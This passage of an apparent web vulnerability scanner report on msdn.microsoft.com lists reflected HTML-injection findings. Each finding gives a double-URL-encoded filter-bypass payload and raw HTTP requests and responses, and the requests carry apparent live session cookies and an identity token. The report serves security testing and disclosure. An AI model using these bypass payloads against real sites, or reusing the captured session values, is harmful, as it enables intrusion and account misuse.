Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:26 GMT
Content-Length: 9192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4104c"><a>afd812d233f/ms689718(v=vs.85)" />
...[SNIP]...

2.122. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4022c%2522%253e%253ca%253e3828408d185 was submitted in the REST URL parameter 3. This input was echoed as 4022c"><a>3828408d185 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(v4022c%2522%253e%253ca%253e3828408d185=vs.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:57 GMT
Content-Length: 9193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(v4022c"><a>3828408d185=vs.85)" />
...[SNIP]...

2.123. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms690384(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e8ab%2522%253e%253ca%253ef7a12be2b11 was submitted in the REST URL parameter 1. This input was echoed as 8e8ab"><a>f7a12be2b11 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us8e8ab%2522%253e%253ca%253ef7a12be2b11/library/ms690384(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8e8ab"><a>f7a12be2b11/library/ms690384(VS.85)" />
...[SNIP]...

2.124. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms690384(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65890%2522%253e%253ca%253ec471cad6006 was submitted in the REST URL parameter 2. This input was echoed as 65890"><a>c471cad6006 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library65890%2522%253e%253ca%253ec471cad6006/ms690384(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library65890"><a>c471cad6006/ms690384(VS.85)" />
...[SNIP]...

2.125. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms690384(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e453%2522%253e%253ca%253e10d89de2b26 was submitted in the REST URL parameter 3. This input was echoed as 7e453"><a>10d89de2b26 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms690384(VS.85).aspx7e453%2522%253e%253ca%253e10d89de2b26 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms690384(VS.85).aspx7e453"><a>10d89de2b26" />
...[SNIP]...

2.126. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms691105(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34672%2522%253e%253ca%253e13af3ebde69 was submitted in the REST URL parameter 1. This input was echoed as 34672"><a>13af3ebde69 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us34672%2522%253e%253ca%253e13af3ebde69/library/ms691105(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 